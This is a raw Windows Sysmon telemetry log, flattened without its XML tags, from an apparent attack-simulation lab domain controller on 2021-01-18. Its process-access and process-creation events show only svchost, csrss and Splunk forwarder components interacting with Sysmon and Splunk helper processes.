13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:48.689{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-92EC-6005-C704-00000000A301}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.689{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92EC-6005-C704-00000000A301}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.690{59A5CD1D-92EC-6005-C704-00000000A301}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.158{59A5CD1D-92EC-6005-C604-00000000A301}24844232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92EC-6005-C604-00000000A301}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-92EC-6005-C604-00000000A301}2484C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.017{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92EC-6005-C604-00000000A301}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:48.018{59A5CD1D-92EC-6005-C604-00000000A301}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92ED-6005-C804-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:49.830{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
